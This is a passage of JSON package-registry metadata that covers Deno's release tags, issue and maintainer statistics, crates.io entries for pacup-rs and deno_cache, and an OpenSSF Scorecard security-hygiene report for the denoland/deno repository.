github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-07T15:22:18.446Z","dependent_packages_count":0,"downloads":540,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":89.77300844001724,"dependent_repos_count":29.318292202377133,"dependent_packages_count":33.81230354737315,"stargazers_count":0.039405075007102074,"forks_count":0.09805448897116098,"average":30.608212750749157},"purl":"pkg:cargo/pacup-rs","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/pacup-rs","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/pacup-rs","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/pacup-rs/dependencies","status":"removed","funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-07T13:25:49.747Z","issues_count":6659,"pull_requests_count":9671,"avg_time_to_close_issue":17134708.21400472,"avg_time_to_close_pull_request":1530358.8397069778,"issues_closed_count":3811,"pull_requests_closed_count":8053,"pull_request_authors_count":591,"issue_authors_count":2494,"avg_comments_per_issue":2.5029283676227663,"avg_comments_per_pull_request":0.7209182090786889,"merged_pull_requests_count":7031,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":681,"past_year_pull_requests_count":1194,"past_year_avg_time_to_close_issue":1348806.688034188,"past_year_avg_time_to_close_pull_request":1303670.810240964,"past_year_issues_closed_count":234,"past_year_pull_requests_closed_count":664,"past_year_pull_request_authors_count":193,"past_year_issue_authors_count":377,"past_year_avg_comments_per_issue":1.234948604992658,"past_year_avg_comments_per_pull_request":1.134003350083752,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":497,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":396,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacup-rs/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacup-rs/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacup-rs/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacup-rs/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacup-rs/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacup-rs/codemeta","maintainers":[{"uuid":"193057","login":"TylerJerme","name":null,"email":null,"url":"https://github.com/TylerJerme","packages_count":4,"html_url":"https://crates.io/users/TylerJerme","role":null,"created_at":"2023-01-11T08:25:06.880Z","updated_at":"2023-01-11T08:25:06.880Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/TylerJerme/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":5272210,"name":"deno_cache","ecosystem":"cargo","description":"Implementation of Cache API for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":191,"first_release_published_at":"2022-09-28T12:33:49.136Z","latest_release_published_at":"2026-08-27T15:22:16.684Z","latest_release_number":"0.191.0","last_synced_at":"2026-09-07T22:57:41.990Z","created_at":"2022-09-28T12:48:14.271Z","updated_at":"2026-09-07T22:57:41.991Z","registry_url":"https://crates.io/crates/deno_cache/","install_command":"cargo install deno_cache","documentation_url":"https://docs.rs/deno_cache/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: 